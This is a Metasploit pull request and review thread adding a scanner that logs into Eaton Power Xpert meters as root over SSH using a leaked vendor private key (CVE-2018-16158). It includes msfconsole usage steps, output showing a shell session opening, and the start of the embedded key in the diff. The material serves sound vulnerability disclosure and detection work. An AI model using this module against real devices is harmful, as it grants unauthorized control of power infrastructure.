### PR TITLE
Scan module for eaton_xpert_backdoor CVE-2018-16158 

### PR DESCRIPTION
**Pull request by BrianWGray**
Module scans for Eaton Xpert Power meters with a vendor SSH private key used in the device firmware's build process.

**Usage**
- [x] Start `msfconsole`
- [x] `use auxiliary/scanner/ssh/eaton_xpert_backdoor`
- [ ] `set RHOSTS 192.168.135.155`
- [ ] `run -z`

**Example output**
```
[+] 192.168.135.155:22 - Logged in as admin
[*] Command shell session 1 opened (192.168.135.1:62063 -> 192.168.135.155:22) at 2018-08-31 19:12:21 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

- [ ] `sessions`
```

Active sessions
===============

  Id  Name  Type   Information                                                      Connection
  --  ----  ----   -----------                                                      ----------
  1         basic   Eaton Xpert Meter SSH Backdoor (SSH-2.0-OpenSSH_7.7p1 Debian-4)  192.168.135.1:62063 -> 192.168.135.155:22 (192.168.135.155)

```

### CODE REVIEW

File: modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb [hunk 1]
```diff
@@ -0,0 +1,141 @@
...
+    remove_socket(ssh.transport.socket)
+  end
+
+  def rport
+    datastore['RPORT']
+  end
+
+  def key_data
+    <<EOF
+-----BEGIN RSA PRIVATE KEY-----
```
Comment (jhart-r7) [inline modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb]: Probably worth a PR to https://github.com/rapid7/ssh-badkeys/

File: modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb [hunk 2]
```diff
@@ -0,0 +1,141 @@
...
+        passwordless authentication to any other affected Power Xpert Meter.
+        The vendor recommends updating to Version 13.4.0.10 or above. As the key is
+        easily retrievable, an attacker can use it to gain unauthorized remote
+        access as uid0
+      },
+      'Author'         => [
+        'BrianWGray'
+      ],
+      'References'     => [
+        ['CVE', 'CVE-2018-16158'],
```
Comment (jrobles-r7) [inline modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb]: Remove `CVE-` from `CVE-2018-16158`.

**Comment by BrianWGray** [comment]
For what it's worth, note the Kex/Encryption downgrade requirements that must be set to connect to the device.

**Comment by h00die** [comment]
@BrianWGray Believe we're still waiting on some module documentation for this.  That would also help clean up a lot of the comments at the top of the module

**Review by h00die — CHANGES_REQUESTED** [review]

File: modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb [hunk 3]
```diff
@@ -0,0 +1,129 @@
...
+        Tested on: Firmware 12.1.9.1 and 13.3.2.10. As the key is easily retrievable.
+        an attacker can use it to gain unauthorized remote access as uid0
+      },
+      'Author'         => [
+        'BrianWGray'
+      ],
+      'References'     => [
+        ['CVE', '2018-16158'],
+        ['EDB', '45283'],
+        ['URL', 'http://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/PXM-Advisory.pdf'],
```
[the remark this answers is not in the document]
Comment (BrianWGray) [reply modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb]: Yeah, the vendor wanted as little to do with the issue as possible until I asked about publishing Nexpose/MSF checks for it. I wasn't surprised at all by the minimalistic notice.

**Comment by h00die** [comment]
@BrianWGray Thanks for hanging in there, we're just really backed up right now!  Thanks also for the first time submission!  I would have had this landed a few days ago but unfortunately had an Americans Funniest Home Videos moment where I rolled an ankle going down the stairs and face planted into the side of the car.  Been on the couch ever since :(

I had 2 very minor edits, while you've been awesome on getting requested changes in, I didn't want to delay this any further!  https://github.com/rapid7/metasploit-framework/commit/17b37b2ad91216091c22956d6ceb4dad7a4cb439 (the msf md->html doesn't always agree with githubs, so just some minor formatting), and https://github.com/rapid7/metasploit-framework/commit/de014f05995db61e1a251808becae7a6d587d442

**Comment by h00die** [comment]
# Release Notes
This module adds an SSH scanner for Eaton power meters with a known private key

**Pull request merged**